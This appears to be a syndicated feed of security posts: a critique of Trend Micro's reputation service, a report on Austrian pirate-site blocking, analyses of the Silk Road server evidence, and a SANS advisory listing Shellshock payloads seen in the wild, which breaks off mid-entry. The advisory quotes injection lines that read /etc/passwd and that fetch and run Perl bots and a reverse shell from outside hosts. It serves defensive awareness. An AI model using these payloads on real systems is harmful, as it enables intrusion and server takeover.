This becomes extremely useful when identifying a network attacker. Is the attack personal, or is it a known bot that is attacking everyone on the Internet? Is it an isolated system, or part of a larger network? Is it coming directly, or hiding behind an anonymous proxy network? Today, FotoForensics just identifies attacks. Tomorrow it will identify attackers.
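The DNS trick described above is easy to reproduce: reverse the IPv4 octets, prepend them to the blocklist's zone, and interpret the answer. A minimal sketch (the zone name is illustrative; real deployments choose specific blocklists, and the network lookup only happens when you actually run it):

```python
import socket

def dnsbl_name(ip, zone='zen.spamhaus.org'):
    """Encode an IPv4 address into a DNSBL query hostname:
    1.2.3.4 against zone X becomes 4.3.2.1.X"""
    return '.'.join(reversed(ip.split('.'))) + '.' + zone

def is_listed(ip, zone='zen.spamhaus.org'):
    try:
        # An A-record answer (e.g. 127.0.0.x) encodes the threat type;
        # NXDOMAIN means the address is not listed.
        socket.gethostbyname(dnsbl_name(ip, zone))
        return True
    except socket.gaierror:
        return False
```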

Reputation at Stake

Beyond DNS lookup systems, there are some reputation-based query services. While the DNS blocklist (dnsbl) services are generally good, the web based reputation systems vary in quality. Many of them seem to be so inaccurate or misleading as to be borderline snake oil.

Back in 2012, I wrote about Websense and how their system really failed to work. This time, I decided to look at Trend Micro.

The Trend Micro Site Safety system takes a URL and tells you whether it is known hostile or not. It even classifies the type of service, such as shopping, social, or adult content.

To test this system, I used FotoForensics as the URL.

According to them, my server has never been evaluated before and they would evaluate it now. I looked at my logs and, yes, I saw them query my site:

– - [05/Oct/2014:06:35:45 -0500] “GET / HTTP/1.1″ 200 139 “-” “Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)”
– - [05/Oct/2014:06:52:05 -0500] “GET / HTTP/1.1″ 200 139 “-” “Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)”

The first thing I noticed is that it never crawled my site. It only looked at the opening page. They downloaded no images, ignored the CSS, and didn’t look anywhere else for text to analyze. This is the same mistake that Websense made.

The second thing I noticed was the lie: they say that they have never looked at my site before. Let’s look back at my site’s web logs. The site was publicly announced on February 9, 2012.

– - [10/Feb/2012:03:28:56 -0600] “GET / HTTP/1.0″ 200 1865 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)”
– - [10/Feb/2012:05:55:32 -0600] “GET / HTTP/1.0″ 200 1865 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)”
– - [10/Feb/2012:12:16:30 -0600] “GET / HTTP/1.0″ 200 1865 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)”
– - [10/Feb/2012:12:16:34 -0600] “GET / HTTP/1.0″ 200 1865 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)”
– - [10/Feb/2012:23:21:51 -0600] “GET / HTTP/1.0″ 200 1865 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)”
– - [11/Feb/2012:06:51:29 -0600] “GET / HTTP/1.0″ 200 1865 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)”
– - [14/Feb/2012:02:00:48 -0600] “GET / HTTP/1.0″ 200 1865 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)”
– - [14/Feb/2012:03:24:48 -0600] “GET / HTTP/1.0″ 200 1865 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)”
– - [14/Feb/2012:03:25:51 -0600] “GET / HTTP/1.0″ 200 1865 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)”

All of these network addresses are Trend Micro. According to my logs, they visit my site and the “/” URI often, usually multiple times per day. There were 1,073 visits in 2012, 4,443 visits in 2013, and over 2,463 (so far) in 2014. So I certainly do not believe their page when it says that they have never visited the site before.
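Tallies like these fall out of a single pass over the access log. A sketch, assuming Apache-style timestamps like those in the entries above:

```python
from collections import Counter
import re

# Count one crawler's visits per year from access-log lines with
# Apache-style "[10/Feb/2012:03:28:56 -0600]" timestamps.
YEAR = re.compile(r'\[\d{2}/\w{3}/(\d{4}):')

def visits_per_year(lines):
    years = Counter()
    for line in lines:
        m = YEAR.search(line)
        if m:
            years[m.group(1)] += 1
    return years
```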

Since they clearly scanned my site, I wanted to see the results. I rechecked their service an hour later, a few hours later, and over a day later. They still report it as being untested.

Uploading Content

Trend Micro first got my attention back in 2012, when they were automatically banned for uploading porn to FotoForensics. What happened: someone using Trend Micro’s reputation software uploaded porn to FotoForensics. A few seconds later, the reputation system checked the URL and ended up uploading the same porn, resulting in an automatic ban.

This second upload happened because Trend Micro was checking a GET request. And in this case, the GET was used to upload a URL containing porn to my site.

Besides performing a double upload, these duplicate requests can cause other problems. You know all of those online shopping sites that say “Do not reload or your credit card may be charged a second time”? Trend Micro might cause that second click since they resubmit URLs.
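A site can defend against this kind of double submission by deduplicating uploads on a content hash. A minimal sketch (not FotoForensics’ actual code):

```python
import hashlib

# Deduplicate uploads by content hash, so a reputation scanner that
# re-fetches the same URL seconds later does not create a second copy.
seen_hashes = set()

def accept_upload(data: bytes) -> bool:
    digest = hashlib.sha256(data).hexdigest()
    if digest in seen_hashes:
        return False        # duplicate: e.g. the scanner's re-submission
    seen_hashes.add(digest)
    return True
```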

I also noticed that Trend Micro’s reputation checker would occasionally upload URL-based attacks to my site. It appears that some bad guys may be using the reputation checker to proxy attacks. This way, if the attack succeeds then the bad guy can get in. And if it is noticed, then the sysadmins would blame Trend Micro. (These attacks stand out in my logs because Trend Micro uploads a URL that nobody else uploads.)

I tried to report these issues to Trend Micro. Back in 2012, I had a short email exchange with them that focused on the porn uploads. (The reply basically disregarded the concern.) Later, in 2013, I provided more detail about the proxy abuses to a Trend Micro employee during a trip to California. But nothing was ever done about it.

After-the-Fact Scanning

One of the biggest issues that I have with Trend Micro’s reputation system is the order of events.

In my logs, I can see a user visiting a unique URL. Shortly after the visit, Trend Micro visits the same URL. This means that the user was allowed to visit the site before the reputation was checked. If the site happens to be hostile or contains undesirable content, then the user would be alerted after the fact. If the site hosts malware, then you’re infected long before Trend Micro alerts you of the risk.

To put it bluntly: if Trend Micro is going to be warning users based on a site’s reputation, then shouldn’t the warning come before the user is granted access to the site?

Quality of Reporting

Trend Micro permits users to submit URLs and see the site’s reputation. I decided to spot-check their system. I submitted some friendly sites, some known to be hostile, and some that host adult content… Here are some of the results:

  • Trend Micro: “Safe.”

  • Symantec: “Safe.”
  • Google: “Safe.”
  • Craigslist: “Safe.” Really? Craigslist? Perhaps they didn’t scan some of the escort listings. I gave it the URL to Craigslist “Washington, DC personals”. (I had searched Google for ‘craigslist escorts’ and this was the first result. Thanks DC!) This URL is anything but family friendly. There are subjects like “Sub Bottom Seeking Top/Master for Use and Domination” and “Sunday Closeted Discreet Afternoon Delight”. The Trend Micro result? “Safe”. They classified it as “Shopping” and not adult content.
  • Super T[redacted] (a known porn site). Trend Micro said “Safe” but classified it as “Pornography”. This is a great result and gives me hope for Trend Micro’s system.
  • Singapore Girls. “Safe” and “Adult / Mature Content”. Most other services classify this as a porn site. I wonder where they draw the line between pornography and mature content…
  • Backpage: “Safe, Newsgroups, Shopping, Travel”. I then uploaded the link to their escorts page, which has some explicit nudity and lots of adult content. The result? Safe, Newsgroups, Shopping, Travel. Not even an “18”, “Adult”, or “Mature Content” rating.
  • “Safe, Sports”. I’ll agree with this. It’s a forum for bicycle enthusiasts.
  • 4chan: “Dangerous, Disease Vector”. According to Trend Micro, “Dangerous” means the site hosts malware or phishing. 4chan is not a phishing site, and I have never seen malware hosted at 4chan. While 4chan users may not be friendly, the site does not host malware. This strikes me as a gross misclassification. It should probably be “Safe, 18+, Adult Content, Social Network”.
  • >_: One of 4chan’s channels goes by the name “/b/”. If you see someone talking about “/b/”, then you know they are talking about 4chan’s random topics channel. Outside of 4chan, other forums have their own symbolic names. If you don’t know the site represented by “>_”, then that’s your problem — I’m not going to list the name here. This is a German picture sharing site that has more porn than 4chan. While 4chan has some channels that are close to family friendly, the >_ site is totally not safe for work. Trend Micro says “Safe, Blog/Web Communications”. They say nothing about adult content; if Trend Micro thinks 4chan is “dangerous”, then >_ should be at least as dangerous.

With Filename Ballistics, I have been able to map out a lot of sites that use custom filename formats. A side effect is that I know which sites host mostly family friendly content, and which do not. I submitted enough URLs to Trend Micro’s reputation system that they began to prompt me with a captcha to make sure I’m human. The good news is that they knew most of the sites. The bad news is that they missed a lot of the sites that host adult content and malware.

For a comparison, I tested a few of these sites against McAfee’s SiteAdvisor. McAfee actually scanned FotoForensics and reported “This link is safe. We tested it and didn’t find any significant security issues.” They classified it as “Media Sharing”. (I’ll agree with that.) McAfee also reports that 4chan is suspicious and a “parked domain” (WTF?), that >_ wasn’t tested, that Craigslist is a safe (no malware) site with “Forum/Bulletin Boards”, and that Singapore Girls is “Safe: Provocative Attire”.

Other Lookup Tools

Trend Micro also has an IP address reputation tool. This is supposed to be used to identify whether an address is associated with known spammers, malware, or other online attacks.

At FotoForensics, I’ve been actively detecting, and in some cases blocking, hostile network addresses. I use a combination of a custom intrusion detection system and known DNS Blacklist services. This has dramatically cut down on the number of attacks and other abuses against my site.

I uploaded a couple of network addresses to Trend Micro in order to see how they assigned reputations:

  • The Honeynet Project reports “Suspicious behavior, Comment spammer”. reports “Service abuse (spam, web attacks)”. My own system identified this as a TOR node. Trend Micro reports: “Unlisted in the spam sender list”.

  • This is another Suspicious behavior, Comment spammer, TOR node. Trend Micro fails to identify it.
  • Honeynet Project says “Search engine, Link crawler”. My system identifies it as Googlebot. Trend Micro says “Unlisted in the spam sender list”. This looks like their generic message for “not in any of our databases”.

    Keep in mind, tracking TOR nodes is really easy. If you run a TOR client, then your client automatically downloads the TOR node list. For me, I just start up a client, download the list, and kill the client without ever using TOR. This gives me a large list of TOR nodes and I can just focus on the exit nodes.

    At minimum, every TOR node should be associated with “Suspicious behavior”. This is not because users using TOR are suspicious. Rather, it is because there are too many attackers who use TOR for anonymity. As a hosting site, I don’t know who is coming from TOR and the odds of it being an attacker or spammer are very high compared to non-TOR users.

  • This system actively attacked my site. Trend Micro reports “Bad: DUL”. As they define it, “the Dynamic User List (DUL) includes IP addresses in dynamic ranges identified by ISPs. Most legitimate mail sources have static IP addresses.”

    A Dynamic User List (aka Dialup User List) contains known subnets that ISPs dynamically assign to their customers. These lists are highly controversial. On one hand, they force ISPs to regulate all email and take responsibility for reducing spam. On the other hand, this approach ends up blacklisting a quarter of the Internet. In effect, users must send email through their ISP’s system and are treated as spammers before ever sending an email.

    If this sounds like the Net Neutrality debate, then you’re right — it is. Net neutrality means that ISPs cannot filter spam; all packets are equal, including spam. Without neutrality, ISPs are forced to help mitigate spam.

    The good news is, Trend Micro noticed that this was an untrustworthy address. The bad news is that they classified it because it was a dynamic address and not because they actually noticed it doing anything hostile.

  • This system scanned my site for vulnerabilities. The Honeynet Project says “Suspicious behavior, Comment spammer”. reports “Service abuse (spam, web attacks)”. Trend Micro? “Unlisted in the spam sender list”.

Alright… so maybe Trend Micro is only looking for spammers… Let’s submit some IP addresses from spam that I recently received.

  • Other systems report: Suspicious behavior, Comment spammer, Known proxy, Service abuse (spam, web attacks), Network attack. Trend Micro reports “Bad: DUL”. Again, Trend Micro flagged it because it is a dynamic address and not because they noticed it doing anything bad.

  • None of the services, including Trend Micro, identify it. As far as I can tell, anything from is spam. This range currently accounts for a solid 30% of all spam to my own honeypot addresses.
  • The blacklist services that I use found nothing. JP SURBL identifies it as a spammer’s address. Trend Micro reports it as “Bad: QIL”. According to them, the Quick IP Lookup Database (QIL) stores known addresses used by botnets.

    Botnets typically consist of a wide range of compromised computers that work together as a unit. If you map botnet nodes to geolocations, you will usually see them all over and not limited to a specific subnet. In contrast to botnets, many spammers acquire large sequential ranges of network addresses (subnets) from unsuspecting (or uncaring) hosting sites. They use the addresses for sending spam. While these spam systems may be remotely controlled, the tight cluster is usually not managed like a botnet.

    According to my own spam collection, this specific address is part of spam network that spans multiple subnets ( – and Each subnet runs a different mailing campaign and they are constantly sending spam. This same spammer recently added another subnet:, which includes the previous address.

    This spammer has been active for months, and Trend Micro flags it. However, they identify it as “Bad: QIL”. As far as I can tell, this address is not part of a botnet (as identified by QIL). Instead, this spammer signs up with various hosting sites and spams like crazy until getting booted out.

  • Most services, including Trend Micro, missed this. Barracuda Central was the only one to identify this as a spammer.
  • This spammer is listed in the blacklist, but Trend Micro does not identify it.
  • I caught this address searching my site for email addresses and sending me spam. It is both a harvester and a spammer. This network address is listed in 7 different spam blacklists. Trend Micro reports it as a botnet (Bad: QIL), but it’s actually part of a sequential set of network addresses (a subnet) used by a spammer.
  • This address is detected by, but not Trend Micro.
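Checking whether an address falls inside one of these sequential spammer subnets is simple CIDR arithmetic. A sketch (the ranges are placeholders, since the actual ranges were redacted from the post):

```python
import ipaddress

# Classify an address against known spammer subnets. A tight sequential
# block like this is a rented subnet, not a botnet.
SPAMMER_NETS = [ipaddress.ip_network(n)
                for n in ('198.51.100.0/24', '203.0.113.0/24')]  # placeholders

def in_spammer_subnet(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in SPAMMER_NETS)
```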

I certainly cannot fault Trend Micro for failing to identify most of the addresses used for spam. Of the 27 public spam blacklists and the three other blacklists that I checked, all of them had high false-negative rates and failed to associate most addresses with spam. Every blacklist seems to have their own tiny, independent set of addresses and there is little overlap. However, Trend Micro’s subset seems to be significantly smaller than other blacklists. The best ones based on my own testing are and

In general, Trend Micro seems correct about the addresses that it flags as hostile — as long as you ignore the cause. Unfortunately, Trend Micro doesn’t know many addresses. You should expect a high false-positive rate due to generic inclusions, and a high false-negative rate (Type-II error) due to their small database. Moreover, many of their matches appear to be caught by generic rules that classify large swaths of addresses as hostile without any proof, rather than any actual detection. This means Trend Micro has a high degree of Type-III errors: correct by coincidence. Finally, Trend Micro seems to classify any network of spam systems as a “botnet”, even when they are not botnets.

About Trend Micro

Trend Micro offers many products. Their anti-virus software is as good as any. But that’s not saying much. As Trend Micro’s CEO Eva Chen said in 2008, “I’ve been feeling that the anti-virus industry sucks. If you have 5.5 million new viruses out there how can you claim this industry is doing the right job?”

Virtually the entire AV industry is reactive. First they detect an outbreak, then they evaluate the problem and create a detector. This means that the attackers always have the advantage: they can create new malware faster than the AV companies can detect and react. The move toward a reputation-based system as a predictor is a good preventative approach.

Unfortunately, Trend Micro seems to have seriously dropped the ball. Their system lies about whether a site has been checked and they validate the site after the user has accessed it. They usually report incorrect information, and when they are right, it seems due more to coincidence than accuracy.

I do believe that a profiling system integrated with a real-time detector is a great proactive alternative. However, Trend Micro’s offerings lack the necessary accuracy, dependability, and reputation. As I reflect on Eva Chen’s statement, I can only conclude one thing: it’s been six years, and they still suck.

TorrentFreak: Court Orders Immediate Pirate Site Blockade

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

The site at the center of this case, at the time one of the world’s largest illegal streaming portals, was shut down in 2011 as part of Europe’s largest ever action against piracy sites.

However, just a month before the site was dismantled, Austrian ISP ‘UPC’ was served with a preliminary injunction ordering it to block subscriber access to the site. The order had been obtained by the Hollywood-affiliated anti-piracy group VAP but it was called into doubt by the ISP. This led to the Austrian Supreme Court referring the matter to the European Court of Justice.

Earlier this year the ECJ handed down its widely publicized decision which stated that yes, in reasonable circumstances, pirate sites can indeed be blocked by European ISPs.

On the back of this ruling, VAP subsequently wrote to several local ISPs (UPC, 3, Tele2 and A1) demanding blockades of Movie4K and Kinox, one of them a site that took over from the dismantled portal. This would become the test case on which all future blockades would be built.

When this formal request for the ISPs to block the sites was rejected, in August VAP sued the providers. And now, after more than three years of wrangling, VAP have finally got their way.

In a ruling handed down yesterday by the Commercial Court of Vienna, UPC, 3, Tele2 and A1 were ordered to block Movie4K and Kinox with immediate effect. According to Der Standard, UPC and A1 placed blocks on the sites within hours, with 3 and Tele2 expected to comply with the injunction today.

But while another important hurdle has now been overcome, there is some way to go before VAP will have achieved everything they initially set out to do. At issue now is how far the ISPs will have to go in order to comply with the court order. It’s understood that VAP requires DNS and IP address blocking at a minimum, but whether the ISPs intend to comply with that standard remains to be seen.

It’s important for VAP, and other anti-piracy groups waiting in the wings, that these technical steps are workable going forward. Both VAP and the IFPI have lists of sites they would like blocked in the same way as Movie4K and Kinox have been, so it’s crucial to them that blockades aren’t easily circumvented.

Once this issue has been dealt with, in the next few months it’s likely that attention will turn to legal action being planned by the IFPI. The recording group has taken on the task of having torrent sites blocked in Austria, starting off with The Pirate Bay, among others.

IFPI is expected to sue several ISPs in the hope that local courts will treat torrent sites in the same way as they have streaming services. Once that’s been achieved – and at this stage it seems likely – expect long lists of additional domains to be submitted to the courts.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

Errata Security: Reading the Silk Road configuration

This post was syndicated from: Errata Security and was written by: Robert Graham. Original post: at Errata Security

Many of us believe it wasn’t the FBI who discovered the hidden Silk Road server, but the NSA (or other intelligence organization). We believe the FBI is using “parallel construction”, meaning creating a plausible story of how they found the server to satisfy the courts, but a story that isn’t true.

Today, Brian Krebs released data from the defense team that seems to confirm the “parallel construction” theory. I thought I’d write up a technical discussion of what was found.

The Tarbell declaration

A month ago, the FBI released a statement from the lead investigator, Christopher Tarbell, describing how he discovered the hidden server (“the Tarbell declaration“). This document had four noticeable defects.

The first is that the details are vague. It is impossible for anybody with technical skill (such as myself) to figure out what he did.

The second problem is that some of the details are impossible, such as seeing the IP address in the “packet headers”.

Thirdly, he saved none of the forensics data. You’d have thought that, had this been real, he would have at least captured packet logs or even screenshots of what he did. I’m a technical blogger. I document this sort of thing all the time. It’s not hard for me, and it shouldn’t be hard for the FBI when it’s the cornerstone of the entire case.

Lastly, Tarbell doesn’t even deny it was parallel construction. A scenario of an NSA agent showing up at the FBI offices and opening a browser to the server’s IP address fits within his description of events.

I am a foremost Internet expert on this sort of thing. I think Christopher Tarbell is lying.

The two servers involved

There were two servers involved.

The actual Tor “onion” service ran on a server in Germany. This was the front-end server.

The Silk Road data was held on a back-end server in Iceland. This is the server Tarbell claims to have found.

The data dumped today on Brian Krebs’ site is configuration and log files from the second server.

The Icelandic configuration

The Icelandic backend had two “sites”, one on HTTP (port 80) running the phpmyadmin pages, and a second on HTTPS (port 443) for communicating the Silk Road content to the German onion server.

The HTTP (port 80) configuration is shown below. Because this requires “basic authentication”, Tarbell could not have accessed the server on this port.

However, the thing to note about this configuration is that “basic” authentication was used over port 80. If the NSA were monitoring links to/from Iceland, they could easily have discovered the password and used it to log onto the server. This is basic cybersecurity, what the “Wall of Sheep” at DefCon is all about.
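To see why this matters: HTTP “basic” authentication only base64-encodes the credentials, so anyone passively watching port 80 can recover them. A quick illustration (the credentials are hypothetical):

```python
import base64

# What a passive observer on the wire sees when HTTP Basic auth is used
# without TLS: the Authorization header is base64, not encryption.

def credentials_from_header(header_value):
    # header_value looks like: Basic dXNlcjpzM2NyM3Q=
    scheme, _, token = header_value.partition(' ')
    assert scheme == 'Basic'
    user, _, password = base64.b64decode(token).decode().partition(':')
    return user, password
```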

The following picture shows the configuration of the HTTPS site.

Notice firstly that the “listen 443” directive specifies only a port number and not an IP address. Consequently, anybody on the Internet could connect to the server and obtain its SSL certificate, even if they cannot get anything but an error message from the web server. Brian Krebs quotes Nicholas Weaver as claiming “This suggests that the Web service specifically refuses all connections except from the local host and the front-end Web server”. This is wrong: the web server accepts all TCP connections, though it may give a “403 forbidden” as the result.

BTW: one plausible way of having discovered the server is to scan the entire Internet for SSL certificates, then correlate information in those certificates with the information found going across the Tor onion connection.

Next is the location information that allows only localhost, the German server, and then denies everything else (“deny all”). As mentioned above, this doesn’t prevent the TCP connection, but does produce a “403 forbidden” error code.

However, there is a flaw: this configuration is overridden for PHP files in the next section down. I’ve tested this on my own server. While non-PHP files are not accessible on the server, anything with the .php file extension still runs for everyone.

Worse yet, the login screen uses “/index.php”. The rules above convert an access of “/” automatically to “/index.php”. If indeed the server has the file “/var/www/market/public/index.php”, then Tarbell’s explanation starts to make sense. He’s still missing important details, and of course, there is no log of him having accessed the server this way, but this demonstrates that something like his description isn’t impossible. One way this could have been found is by scanning the entire Internet for SSL servers, then searching for the string “Silkroad” in the resulting webpage.
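The flaw described above can be illustrated with an nginx fragment. This is a hypothetical reconstruction of the pattern, not the actual Silk Road configuration, and the allowed addresses are placeholders:

```
location / {
    allow;          # localhost
    allow;        # the front-end server (placeholder address)
    deny  all;                # everyone else gets "403 Forbidden"
}

location ~ \.php$ {
    # No allow/deny rules here, so the restrictions above do not apply:
    # anything ending in .php, including /index.php, runs for everyone.
    fastcgi_pass unix:/var/run/php-fpm.sock;
}
```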

The log files

The FBI imaged the server, including all the log files. Typical log entries looked like the following:

– - [14/Jul/2013:06:55:33 +0000] “GET /orders/cart HTTP/1.0″ 200 49072 “http://silkroadvb5piz3r.onion/silkroad/item/0f81d52be7″ “Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0″

Since the defense could not find in the log files where Tarbell had accessed the system, the prosecutors helped them out by pointing to entries that looked like the following:

– - [11/Jun/2013:16:58:36 +0000] “GET / HTTP/1.1″ 200 2616 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.110 Safari/537.36″
– - [11/Jun/2013:16:58:36 +0000] “GET /phpmyadmin.css.php?server=1&lang=en&collation_connection=utf8_general_ci&token=451ca1a827cda1c8e80d0c0876e29ecc&js_frame=right&nocache=3988383895 HTTP/1.1″ 200 41724 “” “Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.110 Safari/537.36″

However, these entries are wrong. First, they are for the phpmyadmin pages and not the Silk Road login pages, so they are clearly not the pages described in the Tarbell declaration. Second, they return a "200 OK" status code instead of the "401 Unauthorized" login error one would expect from the configuration. This means either the FBI knew the password, or the configuration changed in the meantime, or something else is wrong with the evidence provided by the prosecutors.


As an expert in such topics as sniffing passwords and masscanning the Internet, I know that tracking down the Silk Road site is well within the NSA's capabilities. Looking at the configuration files, I can attest to the fact that the Dread Pirate Roberts sucked at op-sec.

As an expert, I know the Tarbell declaration is gibberish. As an expert reading the configuration and logs, I know that it doesn't match the Tarbell declaration. That's not to say that the Tarbell declaration has been disproven; it's just that "parallel construction" is a better explanation for what's going on than Tarbell actually having found the Silk Road server on his own.

Krebs on Security: Silk Road Lawyers Poke Holes in FBI’s Story

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

New court documents released this week by the U.S. government in its case against the alleged ringleader of the Silk Road online black market and drug bazaar suggest that the feds may have some ‘splaining to do.

The login prompt and CAPTCHA from the Silk Road home page.


Prior to its disconnection last year, the Silk Road was reachable only via Tor, software that protects users' anonymity by bouncing their traffic between different servers and encrypting the traffic at every step of the way. Tor also lets anyone run a Web server without revealing the server's true Internet address to the site's users, and this was the very technology that the Silk Road used to obscure its location.

Last month, the U.S. government released court records claiming that FBI investigators were able to divine the location of the hidden Silk Road servers because the community’s login page employed an anti-abuse CAPTCHA service that pulled content from the open Internet — thus leaking the site’s true Internet address.

But lawyers for alleged Silk Road captain Ross W. Ulbricht (a.k.a. the “Dread Pirate Roberts”) asked the court to compel prosecutors to prove their version of events.  And indeed, discovery documents reluctantly released by the government this week appear to poke serious holes in the FBI’s story.

For starters, the defense asked the government for the name of the software that FBI agents used to record evidence of the CAPTCHA traffic that allegedly leaked from the Silk Road servers. The government essentially responded (PDF) that it could not comply with that request because the FBI maintained no records of its own access, meaning that the only record of their activity is in the logs of the seized Silk Road servers.

The response that holds perhaps the most potential to damage the government's claim comes in the form of a configuration file (PDF) taken from the seized servers. Nicholas Weaver, a researcher at the International Computer Science Institute (ICSI) and at the University of California, Berkeley, explains the potential significance:

“The IP address listed in that file — — was the front-end server for the Silk Road,” Weaver said. “Apparently, Ulbricht had this split architecture, where the initial communication through Tor went to the front-end server, which in turn just did a normal fetch to the back-end server. It’s not clear why he set it up this way, but the document the government released in 70-6.pdf shows the rules for serving the Silk Road Web pages, and those rules are that all content – including the login CAPTCHA – gets served to the front end server but to nobody else. This suggests that the Web service specifically refuses all connections except from the local host and the front-end Web server.”

Translation: Those rules mean that the Silk Road server would deny any request from the Internet that wasn’t coming from the front-end server, and that includes the CAPTCHA.

“This configuration file was last modified on June 6, so on June 11 — when the FBI said they [saw this leaky CAPTCHA] activity — the FBI could not have seen the CAPTCHA by connecting to the server while not using Tor,” Weaver said. “You simply would not have been able to get the CAPTCHA that way, because the server would refuse all requests.”

The FBI claims that it found the Silk Road server by examining plain text Internet traffic to and from the Silk Road CAPTCHA, and that it visited the address using a regular browser and received the CAPTCHA page. But Weaver says the traffic logs from the Silk Road server (PDF) that also were released by the government this week tell a different story.

“The server logs which the FBI provides as evidence show that, no, what happened is the FBI didn’t see a leakage coming from that IP,” he said. “What happened is they contacted that IP directly and got a PHPMyAdmin configuration page.” See this PDF file for a look at that PHPMyAdmin page. Here is the PHPMyAdmin server configuration.

But this is hardly a satisfying answer to how the FBI investigators located the Silk Road servers. After all, if the FBI investigators contacted the PHPMyAdmin page directly, how did they know to do that in the first place?

“That’s still the $64,000 question,” Weaver said. “So both the CAPTCHA couldn’t leak in that configuration, and the IP the government visited wasn’t providing the CAPTCHA, but instead a PHPMyAdmin interface. Thus, the leaky CAPTCHA story is full of holes.”

Many in the Internet community have officially called baloney [that's a technical term] on the government’s claims, and these latest apparently contradictory revelations from the government are likely to fuel speculation that the government is trying to explain away some not-so-by-the-book investigative methods.

"I find it surprising that when given the chance to provide a cogent, on-the-record explanation for how they discovered the server, they instead produced a statement that has been shown inconsistent with reality, and that they knew would be inconsistent with reality," Weaver said. "Let me tell you, those tin foil hats are looking more and more fashionable each day."

SANS Internet Storm Center, InfoCON: yellow: Shellshock: A Collection of Exploits seen in the wild, (Mon, Sep 29th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: yellow and was written by: SANS Internet Storm Center, InfoCON: yellow. Original post: at SANS Internet Storm Center, InfoCON: yellow

Ever since the shellshock vulnerability has been announced, we have seen a large number of scans probing it. Here is a quick review of exploits that our honeypots and live servers have seen so far:

1 – Simple “vulnerability checks” that used custom User-Agents:

() { 0v3r1d3;};echo \x22Content-type: text/plain\x22; echo; uname -a;
() { :;}; echo 'Shellshock: Vulnerable'
() { :;};echo content-type:text/plain;echo;echo [random string];echo;exit
() { :;}; /bin/bash -c "echo testing[number]"; /bin/uname -a\x0a\x0a
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36 \x22() { test;};echo \x5C\x22Content-type: text/plain\x5C\x22; echo; echo; /bin/cat /etc/passwd\x22 http://[IP address]/cgi-bin/test.cgi

This one is a bit different. It includes the tested URL as user agent. But of course, it doesn’t escape special characters correctly, so this exploit would fail in this case. The page at appears to only return an “empty page” message.

() { :;}; /bin/bash -c \x22wget -U BashNslash.\x22
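Every variant above rides on the same bash parsing bug (CVE-2014-6271): bash executed trailing commands while importing a function definition from an environment variable. Here is the widely published self-test, run locally via Python as a sketch; a patched bash prints only the echo output, a vulnerable one prints "vulnerable" first:

```python
import subprocess

# Function definition plus a trailing command in an environment variable;
# a vulnerable bash runs "echo vulnerable" merely by inheriting the variable.
env = {"PATH": "/usr/bin:/bin", "x": "() { :;}; echo vulnerable"}
result = subprocess.run(["bash", "-c", "echo this is a test"],
                        env=env, capture_output=True, text=True)
print(result.stdout)  # patched: just "this is a test"; vulnerable: "vulnerable" first
```

The HTTP probes simply deliver that same string through any header a CGI script exports into bash's environment (User-Agent, Cookie, Host, Referer).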


2 – Bots using the shellshock vulnerability:

This one installs a simple Perl bot that connects to port 6667, channel #bug.

() { :; }; \x22exec('/bin/bash -c cd /tmp ; curl -O ; perl /tmp/cgi ; rm -rf /tmp/cgi ; lwp-download http://xr0b ; perl /tmp/cgi ;rm -rf /tmp/cgi ; wget ; perl /tmp/cgi ; rm -rf /tmp/cgi ; curl -O http://xr0 ; perl /tmp/xrt ; rm -rf /tmp/xrt ; lwp-download ; perl /tmp/xrt ;rm -rf /tmp/xrt ; wget http:// ; perl /tmp/xrt ; rm -rf /tmp/xrt')\x22;" "() { :; }; \x22exec('/bin/bash -c cd /tmp ; curl -O ock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; lwp-download ; perl /tmp/cgi ;rm -rf /tmp/cgi ; wget http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; curl -O ; perl /tmp/xrt ; rm -rf /tmp/xrt ; lwp-download http:// ; perl /tmp/xrt ;rm -rf /tmp/xrt ; wget ; perl /tmp/xrt ; rm -rf /tmp/xrt')\x22;

3 – Vulnerability checks using multiple headers:

GET / HTTP/1.0
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; fr; rv: Gecko/2008092414 Firefox/3.0.3
Accept: */*
Cookie: () { :; }; ping -c 3 [ipaddress]
Host: () { :; }; ping -c 3 [ipaddress]
Referer: () { :; }; ping -c 3 [ipaddress]

4 – Using Multiple headers to install perl reverse shell (shell connects to port 1992 in this case)

GET / HTTP/1.1
Host: [ip address]
Cookie:() { :; }; /usr/bin/curl -o /tmp/; /usr/bin/perl /tmp/
Referer:() { :; }; /usr/bin/curl -o /tmp/; /usr/bin/perl /tmp/

5 – Using User-Agent to report system parameters back (the IP address is currently not responding)

GET / HTTP/1.0
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:27.3) Gecko/20130101 Firefox/27.3
Host: () { :; }; wget -qO- -U="$(uname -a)"
Cookie: () { :; }; wget -qO- -U="$(uname -a)"

6 – User-Agent used to install perl box

GET / HTTP/1.0
Host: [ip address]
